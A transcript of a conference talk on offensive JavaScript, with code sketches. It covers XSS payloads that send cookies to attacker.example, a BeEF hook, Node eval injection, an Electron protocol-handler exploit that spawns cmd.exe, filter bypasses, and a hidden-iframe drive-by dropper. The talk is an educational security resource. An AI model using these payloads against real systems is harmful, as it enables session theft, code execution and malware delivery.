Good morning everyone. Okay. The talk that I'm going to give is titled Captain Marvelous JavaScript. I come from an offensive security background, and over the years that I've got accustomed to the language, I've realized, when I interact with developers, that the versatility of JavaScript allows you to use it not only for dev purposes but also to do a lot of other things offensively. We'll take a look at some of those in the talk today. This is a very light-hearted talk, a very informal talk for that matter. And yeah, let's go ahead and see what I have to offer here. My introduction: my name is Riyaz Walikar. I assume there are about three other Riyazs here; I lost my lanyard in the morning, somebody else took it this morning. So my name is Riyaz Walikar. I am the chief hacker at Appsecco, where I lead offensive security. We're a boutique security consulting company where we help secure our customers' applications and cloud infrastructure by assessing and auditing them and providing real-world guidance on the application fixes. I have several years of experience in offensive security only. I don't understand a lot of the dev world, but from an offensive security point of view, I've worked across applications, systems, the cloud, wireless, all of these areas. I also love to travel and do photography. And I call myself a comic nerd; maybe that's going to be evident in the presentation that we have today. The talk is primarily about the versatility of JS and its application outside the dev environment. We'll look at a couple of unorthodox circumstances and offensive use cases where JavaScript becomes useful. JavaScript is everywhere. The very fact that we now have an exclusive JavaScript conference should tell you that.
As much as it is used to build stuff, several use cases exist where attackers use JavaScript to break stuff. We'll look at examples from the computer security industry where JS is used to detect vulnerabilities, to break stuff, to build payloads, to attack humans as well as infra. This talk is meant to introduce the audience to various applications of JS, or its variations, from an attacker's point of view, and provide real-world examples while doing so. Let's start with the most common attacker view of JavaScript there is: XSS. Everybody is familiar with the concept of XSS? Yes? Okay. A lot of times when we speak to developers, the idea is that even when they have findings available in the form of a report, the proof of concept is normally presented as an alert box. But the real question is, is that all there is to a cross-site scripting attack? Definitely not. We all know that XSS occurs when user-controlled data ends up reflected back to the page and is processed by the browser's JS engine. This user-controlled data, run in the browser's JS engine, will have the same capabilities as any JS that would be executing inside the browser context. So most developers look at JS and think that it's as benign as Mantis, but the way attackers see it, it can be really, really powerful. From an attacker's point of view, XSS can allow us to send session data elsewhere, read secrets in the DOM, redirect users to malware-infested sites, steal system CPU to mine bitcoins, log keystrokes, perform browser exploitation, perform RCEs, run phishing attacks, frame content from other sites into your pages, hack into internal routers, and update the DNS or gateway. We'll look at some of these examples during the rest of the talk. There are automated tools available that allow you to perform post-exploitation with cross-site scripting, the most popular of them being BeEF, right? This is an automated tool to work with XSS-infected zombies.
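As a quick, hedged sketch of the first item on that list, sending session data elsewhere: the classic exfiltration payload ships document.cookie off to an attacker-controlled host. The hostname and endpoint below are placeholders, and a hard-coded string stands in for document.cookie so the construction can be shown outside a browser.

```javascript
// Sketch of a session-stealing XSS payload. In a real injection this runs
// in the victim's browser context after the reflected payload executes.
const cookie = 'SESSIONID=abc123'; // would be document.cookie in the browser
const exfilUrl = 'https://attacker.example/c?d=' + encodeURIComponent(cookie);

// The classic trick: an image request smuggles the data out in the query
// string, so no CORS or fetch permissions are needed.
// new Image().src = exfilUrl;   // (browser-only line, shown for context)
console.log(exfilUrl); // https://attacker.example/c?d=SESSIONID%3Dabc123
```

This is exactly why HttpOnly matters: the flag keeps document.cookie out of reach of script, though as we'll see, that alone doesn't neutralize an XSS.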
Essentially, for browsers that are infected with an XSS payload, you can use BeEF to manage the browser itself. Some of the features BeEF gives you: fingerprint the operating system and the browser itself, identify what the user is trying to do on the system, show a fake Flash update and try to run a binary on the system, identify the internal IP addresses, scan the internal network from the infected browser, use the bunch of Metasploit modules that are also available, and tunnel traffic through the browser itself. These are some screenshots; I'll show you a demo of BeEF itself. So what I have here is a simple application with content that is reflected. If you notice the name parameter in the URL, no matter what I type here, it gets reflected here. If I just type my name, it comes up here. Now, a lot of times the most obvious payload is the script-alert-script, but we're going beyond that. What an attacker will do here in this case is run the BeEF server, which allows you to manage a remote infected browser window. So what I have here is the UI panel of BeEF. On the client, on the target that I want to work with, I'll get the user to run a payload that I have, essentially embedding a script, a hook.js, from the remote attacker machine. What I should then have, as the attacker, is the browser coming up in my BeEF console. From here, I would be able to run the commands that BeEF lets you run on the remote browser. There are many different payloads that I would encourage you to go play with. Try out the fingerprinting with the browser, figuring out if the browser is vulnerable to any of the exploits. Use the browser to move into the network using Metasploit, for example. BeEF as a framework allows you to perform additional attacks beyond your standard alert box.
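To make the demo concrete, here is a hedged reconstruction of what the infected URL looks like. Port 3000 and the /hook.js path are BeEF's defaults; attacker.example, victim.example, and the name parameter are placeholders mirroring the demo app.

```javascript
// The attacker embeds BeEF's hook script through the reflected parameter.
const hook = '<script src="http://attacker.example:3000/hook.js"></script>';

// URL the victim is lured into opening; the vulnerable app reflects `name`
// straight into the page, so the browser fetches and runs hook.js.
const infectedUrl =
  'http://victim.example/page?name=' + encodeURIComponent(hook);

console.log(infectedUrl);
```

Once hook.js runs, the browser polls the BeEF server for commands, which is how the "zombie" shows up in the console.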
The idea essentially that I'm trying to convey is that an XSS is not only the alert or the session cookie being stolen, because developers come back with, hey, my document.cookie has HttpOnly set so you can't steal my cookies, but we can do a ton of other things with your clients' browsers. That's the power of how BeEF would be used in the real world. I'm going to keep the demo short because I have a lot of content to cover. Let's look at another variation of XSS that is not very widely known, but has been spoken about in the media quite recently because of a researcher discovering an XSS in the Google search bar. The variation I'm talking about is called Mutation XSS. Mutation XSS was discovered way back in 2007 and was primarily described by a security researcher called Mario Heiderich. For anybody who's done a lot of security-related work with JavaScript and XSS, Mario is not an unfamiliar name. The technique relies on browser engines modifying the HTML that is provided as input. A security researcher called Yosuke Hasegawa noticed in 2007 that when he was trying the print preview function on one of the applications, the attribute of an element was bleeding into the document. Essentially, if user input was provided as the piece of code that is on the top, the browser would mutate the user input and produce the piece of code that is at the bottom. That's not what is expected. If you've noticed, especially if you write HTML by hand, most HTML pages will work even if you don't have the doctype defined. You could simply have an HTML file with no body, only text, and if you open it in the browser, the browser modifies the DOM so that it adheres to the doctype that the HTML relies on. That's the mutation I'm talking about. User-controlled input is innocuous.
It's harmless when it passes through the server filters, client filters, any web application firewalls there are, any browser protections there are; Chrome itself has an XSS protection engine. All of this is harmless data when it passes through all of these things. But when it finally renders inside innerHTML, the browser mutates the input, causing an XSS to come out over there. Over the years, multiple vectors have been discovered. We'll look at the Google XSS that was published recently. Most attackers would dream of getting an XSS on the most widely visited page on the internet. No matter what browser you use, you would have seen this page; you would be living under a rock if you've not seen this page. The essential idea being that most attackers would want the standard script-alert input that is used to detect XSS to work on the Google homepage. Looking at the background: sometime back in September 2018, a developer working on one of Google's libraries, called Closure, created a commit that removed part of the input sanitization. And between that time and February 2019, Google search was vulnerable. There's no notification or any public news about whether it was exploited in the wild, but it was vulnerable for about five months out there. A researcher called Masato Kinugawa discovered that this allowed a mutation to occur when a noscript tag was used with malformed HTML. To see the way the browser mutation occurred — this is an example, and when the slides are available to you folks, I would recommend that you try this out — save the first part as a.html and the second piece of code as b.html, open both in Chrome, and view the rendered source in the console.
What you notice is that with the first piece of code, the browser parses through the HTML, reaches the part with the div, and notices that the div contains a script tag. So the browser's HTML engine parses the div and then modifies the DOM content so that you have script as a valid script tag, closes the script tag, and the broken div that is inside becomes part of a title attribute. This is how the browser mutates the broken HTML, the invalid HTML. But in the second case, surprisingly, you have the same thing with the script just moved outside: the first opening tag is a script element, inside which you have the div title. If you notice, if that's all your HTML is, the browser will modify it, move your script inside the head tag, and the body will contain a broken floating element, right? Based on these mutations, imagine that you could pass malicious HTML, malicious JavaScript in the form of maybe an alert(1) or something like that, and it would go through any of the filters or WAFs because in that context it's not executable — which is what happened with the Google mutation XSS. The Closure library utilized the template tag to obtain safe HTML. Now, the template tag is an interesting one, because when you assign HTML to the innerHTML of a template, the JavaScript inside it is not parsed, right? But if you assign the same thing to a div's innerHTML, for example, the JavaScript inside it is going to be parsed. We'll take a look at it with an example. So essentially, you pass a noscript tag containing a broken noscript tag and an XSS vector that gets parsed by the template as standard HTML but gets rendered by the div, which is where the execution of JavaScript occurs. I'll do this in the console so that it's a little more clear. So what I have here, I'll just go to... I normally just type, just to save time.
What we have essentially here is, if you look at it, I've created a div element, okay? What I'm doing now is adding the standard image src, onerror alert payload to the div's innerHTML. As soon as I hit this, it gets parsed as HTML and JavaScript on the page, and then you have an alert(1) executed, okay? Now interestingly, if you have a template created in the same way, and I pass the same thing to the innerHTML of the template tag, it gets processed as a string, right? From there on, you could filter out any malicious attributes that are there, like the onerror attribute, and this is how Closure's input sanitization works. You could then assign it to a div, and what you would have is a harmless div element, right? So essentially, you've filtered out the XSS, the attack and the payload, and then you've created plain old HTML. But in the Google XSS, what happened was when the template was created and this noscript payload was attached to its innerHTML, essentially giving you a string, the div — because what you'd have is the innerHTML of the div, assigned from the template — caused the non-vulnerable part, rather the JavaScript from inside the tag, to become executable. If you notice, the way it was rendered is very different from the way the template tag would see it. If you notice the div, you would have the noscript take care of the p title, and then you have a valid payload here that gets executed. And this is what happened in the case of the Google search bar, causing the attack to succeed over there. Let's look at another case where JavaScript can become useful to attackers, right?
Now, with a lot of Node programming coming up and with Express being the de facto standard for a lot of server-side JavaScript programming, the essential idea is that you move the power of JavaScript to the server, with JavaScript now having access to the operating system and the system resources over there, right? One of the plain old things that attackers like doing when attacking Node servers is executing commands and code on the server itself using native modules that are available alongside Express. The essential idea — and this is across all languages, regardless of whether it is Node or not — is that user-supplied data should never be used inside an execution context without first checking if that data has any special meaning inside that context, right? This is true for all programming languages. The major danger on the server side is that it is extremely difficult to understand and verify where the user data is coming from. A lot of developers restrict their idea of where user data comes from to the browser, and within that, to the request body. So that is going to be sanitized — if you send any attack vectors through the request body, that is going to be sanitized by most developers. But they fail to understand that even the headers coming from the client, including the user agent and the cookies, can be tampered with using a simple MITM proxy like Burp, for example. All of this is user input, right? There are cases of second-order attacks where your user input, which is benign, enters a system on the server and then is processed by another application.
Imagine Facebook, for example. If you pass malicious XSS data, an XSS payload, to Facebook, Facebook will store it, and Facebook is smart enough to prevent your XSS attacks there. It'll HTML-output-encode the data that you pass, and what you see, instead of code executing, is tags — they'll be converted to their equivalent HTML entities. But another application that relies on the Facebook data, unencoded, becomes vulnerable because it trusts that Facebook is going to produce non-malicious data, right? So the attack vector could come from anywhere. You need to ask yourselves: where is the data coming from? Where will the data be processed? What is the execution context where the data is going to be processed? Will the function processing the data validate that the data is benign within the context of that execution? The interesting thing for attackers is that server-side processing has access to the operating system's resources, and user-supplied data may be able to traverse server-side objects to use modules that are already available on the system to cause interesting things on the server. Code execution especially is what most attackers go after. I have a piece of very shoddily written Node Express code. Can you tell me what's the bug here? Essentially, there's an endpoint called greetings. It accepts user input and prints it out to the screen through the response context. What is the bug here? Yeah, eval — and everybody's like, oh, bug, bug. The essential idea is that you do not pass user data without sanitization into an eval context: the eval function itself, setTimeout, setInterval, and the Function constructor. Do not pass user input without sanitizing it into functions that can evaluate your code from a string-based input. I'll do a demo of this.
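The bug boils down to something like the following. This is a hedged, stripped-down stand-in for the Express route — the real demo code isn't shown in the transcript, so greet() here is illustrative of the pattern, not the actual endpoint.

```javascript
// Vulnerable pattern: user-supplied data concatenated straight into eval().
// In the real app, `name` would come from req.query or req.body.
function greet(name) {
  return eval("'Hello ' + '" + name + "'"); // DANGEROUS: evaluates user input
}

console.log(greet('DevConf'));            // normal use: Hello Dev C onf-style output
// An attacker breaks out of the string literal and injects arbitrary JS.
// The "math works everywhere" test case from the talk:
console.log(greet("' + (5 - 2) + '"));    // prints: Hello 3
```

Seeing the arithmetic evaluated (Hello 3 instead of the literal text) is the tell that the parameter reaches an eval context.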
This is a very crudely written web service with multiple routes that perform multiple functions, written in Node Express with a MongoDB backend. We'll take a look at how this can be attacked. We found similar examples during assessments, but let's see. So what I have here is a web service with an auth function where you provide a username and password. It generates a JWT, which I have put in the history. But essentially, if you pass a name variable with the token, it prints your name, right? One of the first key things during assessments, especially if you're testing endpoints like these, is to try math as a test case — it works across all the languages and test cases that we've seen, whether it's SQL injection or, as here, a server-side JS injection. Essentially, if the user data that you pass is going to be evaluated — you know definitely that 5 minus 2 is 3, and it's being evaluated here — you could then try out other JavaScript-related objects. So you know that there is some avenue of attack here, okay? Given that, you could use the file system libraries in Node itself to read files on the system, or if you wanted, you could try to execute commands using require('child_process'), using the child_process module, and transfer the output to your attacker servers. Essentially, what I'm doing here is saying: use the response object's send function to execute this and send the output. I am using the child_process module and the exec method from there to execute a command, and the command is going to pipe its output and send it over netcat to the attacker. To be able to catch this, I have to start nc in listening mode on port 9000. And when I run this... demo file, no token provided. Sorry about this. The token is incorrect. The token has probably expired.
I set this up before the talk. So what has happened here is the code executed on the server, and the output of id has been sent over netcat, right? As the attacker, you could also go a step further and get a reverse shell out of that box. I'll add the reverse shell bit into the slides and you can take a look at it after the talk. Another very interesting area of research for attackers is the desktop world, and JavaScript has moved to the desktop as well, via Electron. Electron is essentially a Chromium front end with a Node.js back end, which gives you a pseudo-native, operating-system-agnostic platform; you can run Electron applications across different operating systems. A lot of commonly used applications have been ported to Electron — Skype, or Slack for that matter, which we actively use, has already moved to Electron. From an attacker's point of view, when the attacker looks at an Electron app, you have an application running on the desktop that's going to parse, analyze, and execute JavaScript, and to which the attacker can send input. It could be a message that the application understands, network traffic, hosted content, a shared file, or any of the features the application uses. The app uses the JS engine to parse the user-provided input, and you could have code execution capabilities there. You ask yourself what could go wrong in this context. There are examples of Electron apps that are commonly used: Visual Studio Code, the most popular of them in my opinion at least, Slack and Skype. There's a project on GitHub that has ported Windows 95 to Electron. I mean, why would somebody do this? But you have Windows 95 on Electron; I thought it was pretty cool. Code execution using JavaScript in desktop applications: there are two case studies I'll cover here, one of them being with a Microsoft product itself.
There's a program called the Attack Surface Analyzer, which essentially takes a snapshot of the system and compares it based on what changes were done to the system. It takes snapshots before and after an installation and does a diff, right? You can see what registry keys changed, do troubleshooting, and essentially identify what attack surface increased for you at the operating system level. ASA uses Electron.NET, which is a wrapper around normal Electron, with an ASP.NET Core application; Electron APIs are then invoked through Electron.NET using a bridge in .NET. An RCE was discovered in ASA due to a very infamous flag in Electron apps called the nodeIntegration flag. This has to be set to false, right? Otherwise, an XSS can result in code execution capabilities. This flag was set to true, which allows a JavaScript payload, delivered through an XSS, to run on the desktop app itself; you could use this to spawn a process on the desktop machine. In this case it was set to true in the WebPreferences in the .cs file. It allows the calling of Node modules, common ones being child_process. So an XSS can result in code execution on the machine. A piece of code that I have here uses child_process to create and spawn a new process — calc, in this case, right? And because you need to send it over HTTP, you need to encode this. You could use a JavaScript encoder, essentially converting each character to its ASCII equivalent, and then on the server, process it using String.fromCharCode. When I say server, I'm talking about the desktop client here, right? Using an encoder to convert this either to Base64 or charCodes so that it can be transferred over the wire, you would have the standard image src, onerror payload eval-ing the encoded payload that you have sent.
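The encoding step just described can be sketched like this. The calc payload string is illustrative; the point is the charCode round-trip that lets the payload travel over the wire past naive filters.

```javascript
// Attacker side: turn the payload into comma-separated character codes so
// it survives filters and HTTP transport as plain digits and commas.
const payload = "require('child_process').exec('calc')"; // illustrative payload
const encoded = payload
  .split('')
  .map(c => c.charCodeAt(0))
  .join(',');

// Victim side: the XSS vector rebuilds and runs it, roughly:
//   <img src=x onerror="eval(String.fromCharCode(114,101,113,...))">
const decoded = String.fromCharCode(...encoded.split(',').map(Number));

console.log(decoded === payload); // true — lossless round trip
```

With nodeIntegration on, the rebuilt string executes with full Node privileges inside the Electron renderer, which is what turns the XSS into process spawning.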
Essentially, this would result in an XSS giving you shell execution capabilities on the desktop client. This was fixed by Microsoft. The other one is a pretty interesting one, because it did not rely on any code nuances inside the application itself, but on how Electron passes arguments along to the native handler — command-line arguments, in this case. The Electron platform itself was vulnerable to a protocol handler vulnerability, affecting apps that use custom protocols. When I talk about custom protocols: you must have seen, sometimes when you install an application on Windows, an entry is made in the registry if the application registers a custom protocol handler, right? For example, the tel protocol — if you find it in HTML, it shows up as an href, and when you click on it, Skype will launch. The operating system knows it has to launch Skype when a tel link is clicked, because that's registered with the operating system. Similarly, Electron apps can register themselves with a protocol handler. In this case, there was a cryptocurrency wallet called Exodus, which had registered the exodus protocol — but any application that registered a protocol with the operating system instantly became vulnerable, because of how Electron passed the command-line arguments along. Funnily enough, if you look at the HTML code there, you could simply do a window.location and use the protocol handler to launch the app on the system. And if you look at the application's command-line arguments using a tool like Process Monitor, or Process Explorer in this case, you would see that the Exodus binary was launched with the protocol handler that is specified here, right?
Now, because this is going to be handled by Chromium, you go through the list of command-line arguments in Chromium and try to find one that Chromium would support that would allow you to execute operating system commands within that context, right? And there definitely was one: a command-line argument called --gpu-launcher. If you pass an argument like this — and this is the exploit code, this is all there is to the exploit code — you would have a script doing window.location to exodus:// with some random string, followed by --gpu-launcher. If you notice the double quote that is here, it closes the argument to Exodus, and anything that is passed after it is sent to Chromium. That was the bug. And essentially, what you would have is the launch of a command prompt on the desktop machine. In both cases — the first one being the nodeIntegration bug — the application environment did not sanitize the user input that came in. In this case, it allowed the user input to reach the Chromium command-line parser, and in the first one, nodeIntegration allowed you to execute operating-system-level commands using the Node module libraries. Now, another interesting thing attackers talk a lot about when it comes to JavaScript is bypassing filters. It's very common, especially in the bug bounty community, everywhere in the world, that there are applications that are somewhat protected against input validation bugs like XSS. Your plain old vanilla tricks — script tags and image srcs and SVG onloads, the standard inputs you would give to a field that you think is vulnerable to an XSS — are normally protected against. Developers have moved to a place where they either rely on the framework or they add additional protections around the code itself.
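The protocol-handler exploit described above can be sketched in a few lines. This is a hedged reconstruction — the exact string Exodus was hit with isn't in the transcript — but the shape is: an unescaped double quote terminates the protocol-handler argument, and --gpu-launcher hands Chromium a program to spawn.

```javascript
// The page the victim opens. Navigating to the custom scheme launches the
// registered handler; the stray " lets everything after it reach Chromium's
// command-line parser as flags, so --gpu-launcher spawns cmd.exe.
const exploitHtml =
  '<script>' +
  'window.location = \'exodus://aaaaa" --gpu-launcher="cmd.exe"\';' +
  '</script>';

console.log(exploitHtml);
```

Everything before the stray quote is just padding for the URL; everything after it is attacker-controlled Chromium flags, which is the whole vulnerability.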
Some of the more common bypasses attackers use are to change the representation of how JS interacts with objects, or to pass object notation and entities to the processing unit in a different form of representation. For instance, instead of sending document.cookie, you would send document['cookie']. Both of these point to the same thing, but because of the way the code is written, one of them may be able to pass through the filters that are on the server. If the proof of concept is simply to generate an alert box, that's more than enough in a lot of cases to get people to take note of what you found. Depending on the filter being targeted, you can analyze the output that is received for various mutations of your representation, and primarily perform any of the following manipulations: represent an object completely differently, although pointing to the same object; use encoding techniques; use string and object manipulation to access functions and attributes; and rely on browser and JS engine implementations to transform objects — the last one being the mutation XSS that we saw earlier. These are a couple of examples from the real world, stuff that has worked in our case as well, when we're assessing an application and we've been told that this application defeats XSS, all protections are in place. We've had success with some of these. The alert with backticks, for example, does not use double quotes and you can still pass a string. eval with alert, if alert is blocked on the server. Function with alert, if alert is blocked and eval is blocked on the server. onerror=alert;throw 1, if brackets are blocked, for example. All of these are variations of how you would bypass custom filters that are written on the server, okay? The onmouseover one is one of my favorites.
This happened in a real-world example where the developers had blocklisted handlers — onclick, onload, all of these. Essentially, if they found one in user input, they would delete the word onmouseover, for example. You could still bypass it by nesting the word inside itself — onmouse, then onmouseover, then over — so the inner onmouseover gets deleted, and what you have left is the concatenation of the rest of the string: a valid onmouseover. And then your alert succeeds there. And JS can get real weird real quick for attackers, especially without understanding how primitives and coercion work. Let's look at how JS, in its weirdest cases, can work and bypass a lot of these filters. I did a small flash talk in Bangalore, and it's available on my GitHub — I'll put it in the references — showing that using only six characters, there are ways by which you can generate complete payloads for your attacks, right? And excuse me for the profanity, but the language itself is called JSFuck. It's a very esoteric, educational programming style where you can take a function and build code, but all of it is going to be rendered using only six characters. I'll do a demo of this. The essential idea is that keywords like false, for example, can be obtained from an exclamation mark and square brackets, and true can be obtained from two exclamation marks and square brackets. Each of these can then be used to build up strings in this form. So if you have alert(0), for example, you can convert the entire alert(0) into what you see here, and then use this as the execution. Let me just pull up a window that I have already available here, okay? There's a proper website for this. If you have your payload, you can enter it here and hit encode, and what you get becomes your payload. So if I just go to the console, right?
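The primitives behind that site are easy to check in any JS engine — these are standard JavaScript type coercions, so the sketch below runs anywhere, not just in the browser console.

```javascript
// JSFuck builds everything from six characters: [ ] ( ) ! +
console.log(![]);            // false — an array is truthy, so negation gives false
console.log(!![]);           // true
console.log(+[]);            // 0 — an empty array coerces to the number 0
console.log(+!![]);          // 1 — true coerces to 1
console.log([] + []);        // "" — array-plus-array coerces to empty string
console.log((![] + [])[0]);  // "f" — false + [] is the string "false"
console.log((![] + [])[1]);  // "a" — index into "false" for more letters
```

By indexing into strings like "false", "true", and "undefined" obtained this way, every character of a payload such as alert(1) can be assembled and handed to an eval-equivalent, all with just those six characters.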
And to see if it works the way it is described: this is alert(1), because what you're constructing with each of those characters is the string a, l, e, r, t, with brackets and a one, and then all of it is sent to eval, right? So each one of these is a representation, and this allows you to automatically construct and create your payloads. We've used this to bypass filters in our assessments as well, so in the real world, this definitely works. Depending on the context where the reflection is occurring, different forms of input can be tried for dynamic filters — the ones that strip blacklisted words, like the onmouseover example that I gave you earlier; you can apply that test case there. Some filters will not detect payloads sent using newline or whitespace characters, and you can then try tab characters, or %0D%0A in between. There was a bug in SharePoint, in the way .NET handles JavaScript payloads: anything after a tag followed by a null character would be rendered innocuous by .NET. But there was a bug in SharePoint where you could pass a null character (%00) immediately after a tag, which the server would pass through, and your payload would still get executed, because you're passing a null character to the server. This is another of my favorites: in the real world, we've seen how attackers use malware and obfuscation to attack targets. We were having a very interesting discussion yesterday with a couple of my friends here about how attackers do not go after a lot of tech folks individually. But if somebody wants to do a mass attack, it's easier to throw the payload at about 500 targets and receive data back from two than to focus on only one or two — unless you're being targeted by three-letter agencies.
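Before moving on, the two filter-bypass tricks above — alternate object notation and defeating a strip-once blacklist — can be sketched together. stripFilter below is a hypothetical stand-in for the real-world filter described earlier, not the actual server code.

```javascript
// 1. Alternate representation: both expressions name the same property, but
//    a naive filter matching the literal "document.cookie" misses the second.
//    (Shown as strings here, since `document` only exists in a browser.)
const direct  = 'document.cookie';
const bracket = "document['cookie']";
console.log(direct !== bracket); // true — different text, same object access

// 2. Strip-once blacklist, as in the real-world onmouseover example:
function stripFilter(input) {
  return input.replace('onmouseover', ''); // deletes the word once
}

// Nest the word inside itself; stripping the inner copy re-forms the outer.
const nested = 'onmouseonmouseoverover';
console.log(stripFilter(nested)); // onmouseover — the handler survives
```

This is why strip-based blacklists should be applied repeatedly until the input stops changing, or better, replaced with output encoding appropriate to the context.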
The essential idea being that almost all modern malware infections, social engineering attempts, phishing and targeted ad campaigns are now delivered over the internet, right? Attackers will compromise high-traffic websites and inject malicious payloads, JavaScript especially, as part of the page, right? This could end up being an iframe on the page, and as soon as you as a user browse to the page, the JavaScript executes in your browser context. The compromise may have been done using a stored XSS, a weak admin password, SQL injection, doesn't matter. The essential idea is that the HTML is modified, so when a user visits this page, the iframe or the JavaScript loads in the browser and the attack happens on the client, right? Attackers also heavily rely on users' browsing habits, right? Especially clickbaity articles. A lot of us do this. Tons of these articles get posted on Facebook or LinkedIn, and Orkut, if it is still alive. I'm not on social media. But the essential idea is that with a lot of clickbaity articles, and especially if somebody is trying to download free software and other things, if you don't have an idea of what you're going to be clicking, you could fall prey to one of these attacks, because it's extremely easy to get users on the internet to navigate to attacker-controlled sites. This attack is called a drive-by download, right? And I was trying to find a meme from Marvel to get this across. The idea being that you as a user are made to go to what looks like a non-malicious, very ordinary website, and then the attacker's code takes over the next set of steps. Now, I tried this on a phone, right? I randomly browsed to a site, and then I have this thing come up on the phone that says virus detected.
Oh, virus detected. Let me see what this is. It says a dangerous virus was found on the Samsung Galaxy S7. I click on OK. It says tap OK to install an app to remove the virus. A lot of people will tap OK to remove the virus; I don't want a virus on my phone. So I clicked OK. And then it says scan completed, your phone is in danger, a malicious virus is found, remove virus. I said OK again, right? I mean, I obviously didn't do this on my own phone; there's a test phone that I use for this. The idea is that I have 11 viruses and I have to click. There was another screenshot which said that my battery is going to die out, or that it's going to explode if I fly out on a plane, something like that. The idea being that fear drives a lot of user actions on the internet, right? I wouldn't want to be a person with a virus on my phone, or with my phone exploding in the middle of a flight, right? So I would go ahead and click on remove virus now. Essentially, a prompt then comes up asking whether you want to install this software. Operating system manufacturers try to reduce the impact this will have by telling you that the application you're about to install requires permissions to access your contacts or camera or to make phone calls and other things. If at that point you say no, no, no and deny access, you're still okay, right? On the browsers, it's very different. He's confused about what happened to his phone. The attack chain essentially being that users are tricked into navigating to a site laden with JS that profiles the browser: any add-ons that you have, the operating system, and other plugins that may be ripe for abuse, Flash, for example. A legitimate site may also be infected with malicious JS via a server-side vulnerability or a compromised content delivery network. A weakness in the browser or a third-party component is then exploited to download and run additional code without user interaction, right?
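The profiling step in that chain is ordinary JavaScript reading what the browser volunteers. Here's a sketch written against a navigator-like object so it runs anywhere; in a real page you would pass in window.navigator, and a kit would key its exploit choice on these fields:

```javascript
// Collect the fields a drive-by kit typically uses to pick an exploit.
function profileBrowser(nav) {
  return {
    ua: nav.userAgent,                                    // browser + version + OS
    platform: nav.platform,                               // e.g. "Win32", "Linux x86_64"
    plugins: Array.from(nav.plugins || [], p => p.name),  // Flash, PDF readers, ...
  };
}

// Simulated navigator for demonstration only.
const fakeNavigator = {
  userAgent: "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36",
  platform: "Win32",
  plugins: [{ name: "Shockwave Flash" }],
};

console.log(profileBrowser(fakeNavigator));
```

Nothing here requires elevated permissions; the browser hands this over to any page that asks, which is exactly why the profiling stage is silent.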
And this is the key bit. Sometimes there's user interaction, where it says click here to win an iPhone. You may have seen these shady ads on the internet, and you would go ahead and click because you want to win an iPhone. And then it asks you to download a binary because it can scan your system for viruses. This is one of the most common ways of payload delivery, where the user has to download and run a binary. I mean, if an attacker is able to get you to click, download and run a binary, it's no longer your system anyway. The user may alternatively be phished into downloading, that's what I'm talking about, and running a binary, irrespective of any browser weakness, right? Sometimes an attacker sees that the browser is patched and fully up to date, and the attack mode changes: then you're offered something to download and run on your system. Obviously, when you run the binary natively on the machine, this gives the attacker access to the entire machine as well as the network, and you could become part of a larger botnet in that case. An example exploit I'll cover is something called the AOL SuperBuddy exploit. A legitimate site was infected with malicious JS, right? Using SQL injection. With SQL injection you'd normally go after data, but the attackers here used the SQL injection to modify HTML on the server. The injected HTML code ended up in all the pages on the site. It was a very popular, high-traffic website, so if you browsed to it as a user, your browser would execute the JS that was there. According to the people who analyzed this, the script checked for a cookie to verify whether the browser had been attacked before, right? If no cookie was found, a new cookie was set to mark the beginning of an exploit. An iframe was created using JS with zero dimensions, width zero and height zero, and this iframe loaded another script from a different domain.
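The infection logic described for that campaign, check a marker cookie, then drop a zero-dimension iframe pointing at a second-stage domain, can be sketched as browser JS. The cookie name and domain below are hypothetical placeholders, and the gating check is split out as a pure function so it can run outside a browser:

```javascript
// Illustrative only: cookie name and second-stage domain are placeholders.

// Pure check, so the gating logic is testable without a DOM.
function shouldInfect(cookieString) {
  return !cookieString.includes("infected=1");
}

// Browser-only part: mark the victim, then drop an invisible iframe.
function dropSecondStage() {
  if (!shouldInfect(document.cookie)) return; // already hit before
  document.cookie = "infected=1; path=/";

  const frame = document.createElement("iframe");
  frame.width = 0;                              // zero dimensions: nothing visible,
  frame.height = 0;                             // but the content still loads and runs
  frame.src = "http://evil.example/stage2.html"; // placeholder second-stage domain
  document.body.appendChild(frame);
}
```

The cookie check is there for the attacker's benefit: a machine is only exploited once, so an analyst revisiting the page sees nothing new.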
It used the User-Agent request header to detect what the user's browser was. If you're coming from a phone, you'd get different content. If you're coming from Firefox or Chrome, you'd get different content. The returned script used obfuscation techniques and polymorphism to make analysis difficult. In particular, and this is a very common trick, it used location.href as the key to decode the encoded string. This makes analysis difficult because you can't set location.href without making the page navigate, right? So that made static analysis of it difficult. A sample of the partially obfuscated code is shown here. The script attempted three different exploits in a loop, targeting different vulnerabilities, right? And if the AOL SuperBuddy plugin was installed in your browser, it created an ActiveX object from it and tried to execute a function. The function essentially did a technique called heap spray, trying to put the payload into the browser's memory. And then the actual trigger was a well-documented vulnerability: a function that was supposed to create an icon but caused an integer overflow. That led to execution of the sprayed payload, which then took control of the browser. This next one is something that has worked quite often in our engagements as well, where JavaScript can be used, and this is slightly difficult to imagine: imagine you're browsing a website and the browser is able to change DNS settings on your home router, right? Imagine you open your email or you browse to Wikipedia or something like that, and the site is able to change settings on the router that you have at home, right? There have been a lot of well-documented cases on the internet where code has been written to identify what your home router is. There are different makes and models, D-Link, TP-Link, for example. Identify what model you have, and then brute-force credentials on this router if you've not changed them from admin/admin.
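The location.href trick works because the decode key is the page's own URL: run the same script anywhere else, a sandbox, a saved local copy, and the decode produces garbage. A minimal sketch of the idea, with a made-up payload and the key passed in as a parameter so it runs outside a browser (in the wild it would read location.href directly):

```javascript
// XOR each character of the payload with the key. XOR is symmetric,
// so the same function both encodes and decodes.
function xorDecode(encoded, key) {
  let out = "";
  for (let i = 0; i < encoded.length; i++) {
    out += String.fromCharCode(
      encoded.charCodeAt(i) ^ key.charCodeAt(i % key.length)
    );
  }
  return out;
}

const key = "http://victim.example/news.html"; // stand-in for location.href
const hidden = xorDecode("alert(1)", key);     // attacker pre-encodes with the same key

console.log(xorDecode(hidden, key)); // round-trips back to "alert(1)"
```

An analyst who copies the script into a different environment gets a different location.href, hence a broken payload, which is exactly why this defeats naive static and sandbox analysis.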
